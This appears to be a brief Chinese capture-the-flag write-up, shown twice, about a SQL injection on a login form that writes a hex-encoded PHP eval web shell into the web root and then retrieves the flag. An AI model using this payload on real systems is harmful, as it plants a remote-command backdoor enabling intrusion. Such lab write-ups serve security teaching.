打开是一个登录界面

这里尝试写一个木马进去,把木马进行hex编码进行绕过
username=admin\
password=;select 0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e into outfile “/var/www/html/1.php”;%23

上传完之后尝试使用木马获得flag

CTF{sql_injection_is_fun}
加载过慢请开启缓存 浏览器默认开启
打开是一个登录界面

这里尝试写一个木马进去,把木马进行hex编码进行绕过
username=admin\
password=;select 0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e into outfile “/var/www/html/1.php”;%23

上传完之后尝试使用木马获得flag

CTF{sql_injection_is_fun}